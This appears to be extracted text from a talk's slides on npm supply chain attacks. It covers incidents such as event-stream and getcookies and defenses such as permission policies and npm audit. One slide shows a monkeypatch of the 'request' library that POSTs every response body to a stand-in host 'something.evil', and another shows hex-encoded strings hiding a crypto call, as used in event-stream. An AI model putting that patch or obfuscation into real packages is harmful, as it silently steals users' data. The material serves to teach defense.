I'm writing Distributed Systems with Node.js:bit.ly/34SHToF
$ npx @intrinsic/loc
Your application code: 68,490 lines ( 2.44%)
`node_modules` code: 2,740,694 lines (97.56%)
We've become quite the lucrative target.
A supply chain attack is a cyber-attack that seeks to damage an organization by targeting less-secure elements in the supply network. – Wikipedia
left-pad
getcookies
getcookies
was a deep dep of mailparser
mailparser
had 64,000 weekly downloadsevent-stream
flatmap-stream
added as dep
description
field of Copaybookeyman
: Feb 13, 2019stream-combine@2.0.2
: Feb 10, 2019portionfatty12
: Jan 15, 2019rrgod
: Jan 15, 2019text-qrcode
: Jan 10, 2019commander-js
: Jan 9, 2019eslint-config-eslint@5.0.2
: Jul 13, 2018Source: Snyk Vulnerability DB
const REQUEST = require('request');
const _Req = REQUEST.Request;
REQUEST.Request = (opts) => { // monkeypatch
const _callback = opts.callback;
opts.callback = function (_e, _r, body) {
const req = require('http').request({
hostname: 'something.evil', method: 'POST'
});
req.write(JSON.stringify(body)).end();
_callback.apply(this, arguments);
};
return new.target ?
Reflect.construct(_Req, [opts]) : _Req(opts);
};
event-stream
incident used encoded stringsfunction d(str) {
return Buffer.from(str, 'hex').toString();
}
d("6372656174654465636970686572"); // "createDecipher"
require(d(n[2]))[d(n[6])](d(n[5]); // minified version
require('crypto')['createDecipher']('aes256', pkgDesc);
--allow-write
, --allow-net
request
be?Socket
instance?const PG = 'postgres://pguser@pghost:9876/auth';
const REDIS = 'redis://redishost:6379/1';
routes.allRoutes(policy => {
policy.sql.allowConnect(PG);
policy.redis.allowConnect(REDIS);
});
routes.get('/users/*', policy => {
policy.redis.allowCommandKey(REDIS, 'GET', 'user-*');
policy.sql.allowQuery(PG, 'SELECT * FROM users');
});
routes.post('/admin/lock', policy => {
policy.fs.allowWrite('/tmp/app.lock');
policy.outboundHttp.allowGet('http://example.org/');
});
Run npm audit
periodically, update when possible.
.npmrc
password with tokennpm audit
bit.ly/2ysIjUc
bit.ly/2FL0AzJ
bit.ly/2sFDwYX
@tlhunter@mastodon.social
intrinsic.com
diff.intrinsic.com
bit.ly/2IWa50A
bit.ly/34SHToF